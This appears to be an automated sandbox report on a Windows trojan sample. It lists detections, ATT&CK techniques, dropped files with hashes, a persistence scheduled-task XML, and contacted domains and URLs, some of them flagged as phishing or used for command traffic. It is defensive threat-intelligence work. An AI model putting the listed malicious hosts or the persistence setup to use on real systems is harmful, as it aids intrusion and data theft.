Source: Yara match	File source: 00000010.00000002.2861231272.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1946159228.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1945331228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2863668034.0000000003030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2863047851.0000000004760000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1948193173.0000000003810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	412 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	1 Modify Registry	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Abuse Elevation Control Mechanism	111 Disable or Modify Tools	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	412 Process Injection	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Abuse Elevation Control Mechanism	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	4 Obfuscated Files or Information	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	22 Software Packing	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 DLL Side-Loading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
FGGx944Qu7.exe	62%	ReversingLabs	Win32.Trojan.Nekark
FGGx944Qu7.exe	67%	Virustotal		Browse
FGGx944Qu7.exe	100%	Avira	HEUR/AGEN.1304432
FGGx944Qu7.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	100%	Avira	HEUR/AGEN.1304432
C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	62%	ReversingLabs	Win32.Trojan.Nekark
C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	67%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
www.oobzxod2xn.cc	2%	Virustotal	Browse
td-ccm-neg-87-45.wixdns.net	0%	Virustotal	Browse
www.drapples.club	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
http://www.drapples.club/q0r6/	100%	Avira URL Cloud	phishing
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
http://www.oobzxod2xn.cc/q0r6/?uZgP=5pyvScKx6ZbOO2uX774/2f03V4PpvoLdLg/OCd1FMvXsxJY7YeHi6SxOzHnr25kvmJZHa8XXHydHc3e54xwdxF+eQrhYMnjeuarocBe7v18XiUqzaWXVlPw=&a6m=8Rw4HDhPzbgPS	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
http://www.drapples.club/q0r6/	0%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://www.drapples.club	100%	Avira URL Cloud	phishing
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
http://www.drapples.club	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.oobzxod2xn.cc	172.67.140.176	true	false	2%, Virustotal, Browse	unknown
94950.bodis.com	199.59.243.225	true	false		unknown
td-ccm-neg-87-45.wixdns.net	34.149.87.45	true	false	0%, Virustotal, Browse	unknown
www.birthingwitht.com	unknown	unknown	true		unknown
www.drapples.club	unknown	unknown	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.oobzxod2xn.cc/q0r6/?uZgP=5pyvScKx6ZbOO2uX774/2f03V4PpvoLdLg/OCd1FMvXsxJY7YeHi6SxOzHnr25kvmJZHa8XXHydHc3e54xwdxF+eQrhYMnjeuarocBe7v18XiUqzaWXVlPw=&a6m=8Rw4HDhPzbgPS	false	Avira URL Cloud: safe	unknown
http://www.drapples.club/q0r6/	false	0%, Virustotal, Browse Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.drapples.club	usFxdnRPYjnb.exe, 00000013.00000002.2865529929.0000000005731000.00000040.80000000.00040000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://www.ecosia.org/newtab/	SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	FGGx944Qu7.exe, 00000000.00000002.1688859188.000000000326F000.00000004.00000800.00020000.00000000.sdmp, TBsjWljiCpR.exe, 00000009.00000002.1885020055.0000000003091000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	FGGx944Qu7.exe, TBsjWljiCpR.exe.0.dr	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.140.176	www.oobzxod2xn.cc	United States	13335	CLOUDFLARENETUS	false
34.149.87.45	td-ccm-neg-87-45.wixdns.net	United States	2686	ATGS-MMD-ASUS	false
199.59.243.225	94950.bodis.com	United States	395082	BODIS-NJUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1443953
Start date and time:	2024-05-19 08:04:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 31s
Hypervisor based Inspection enabled:	false
Report type:	light
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	FGGx944Qu7.exe renamed because original name is a hash value
Original Sample Name:	21d18e20b8b0e17e0b554b5940a7aaed.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@25/16@6/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe
Excluded IPs from analysis (whitelisted): 20.223.36.55
Excluded domains from analysis (whitelisted): ocsp.usertrust.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, crl.usertrust.com, arc.trafficmanager.net, iris-de-prod-azsc-v2-neu-b.northeurope.cloudapp.azure.com, arc.msn.com, ocsp.comodoca.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:04:52	API Interceptor	1x Sleep call for process: FGGx944Qu7.exe modified
02:04:55	API Interceptor	42x Sleep call for process: powershell.exe modified
02:05:00	API Interceptor	1x Sleep call for process: TBsjWljiCpR.exe modified
02:06:05	API Interceptor	1274978x Sleep call for process: SearchProtocolHost.exe modified
07:04:57	Task Scheduler	Run new task: TBsjWljiCpR path: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe

Process:	C:\Users\user\Desktop\FGGx944Qu7.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TBsjWljiCpR.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380285623575084
Encrypted:	false
SSDEEP:	48:+WSU4xympjgs4Rc9tEoUl8NPZHUl7u1iMugeoM0Uyus:+LHxvCsIcnSKRHmOugU1s
MD5:	EFC6A63D5F23F5AC7FECDFF451741D55
SHA1:	E5D4F71EDFE006A4625D308446757E6F3E218895
SHA-256:	539B0A534102AC5E5F0292C7129D93F1F081ED0D65F40BAC9C6C7E67F1F94983
SHA-512:	13E8224D796FECCC95513E054AD23907138F8C28ABFA6611F534AC1BB7FA1BFCABB452E2EA8EA10B2D311912BEDF3690B2C6304B77D1F669B9438831C99787A0
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<...............V.}...@...i...........System.Transactions.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\20291vC

Download File

Process:	C:\Windows\SysWOW64\SearchProtocolHost.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1k4wtsks.qys.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1rfx4p55.jzt.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2odq22e3.wb2.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uya4cokv.3zx.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wftn1kob.rrm.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wms5kunf.vwh.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ys2tmhij.gni.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zuw0b1st.zey.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp1454.tmp

Download File

Process:	C:\Users\user\Desktop\FGGx944Qu7.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1577
Entropy (8bit):	5.1110539282546625
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaIGLxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTev
MD5:	F5A32EE27570DB7ED724677268C9778B
SHA1:	55270ECB864E0F02B8258C440A06DF27ECC02C6F
SHA-256:	62FE36F805962CBB20FFA8616A8B37F2FF5628B6B64F65523EA4753B13D76FB6
SHA-512:	C4A42E20B48849299807A98728C0CB3DC1286223F4C3BF0D430DCDA25F1E28BC7CC8273B0524FCC61613A138D0155D5917DE335601D649DB4893B448B9B80450
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmp350B.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1577
Entropy (8bit):	5.1110539282546625
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaIGLxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTev
MD5:	F5A32EE27570DB7ED724677268C9778B
SHA1:	55270ECB864E0F02B8258C440A06DF27ECC02C6F
SHA-256:	62FE36F805962CBB20FFA8616A8B37F2FF5628B6B64F65523EA4753B13D76FB6
SHA-512:	C4A42E20B48849299807A98728C0CB3DC1286223F4C3BF0D430DCDA25F1E28BC7CC8273B0524FCC61613A138D0155D5917DE335601D649DB4893B448B9B80450
Malicious:	false
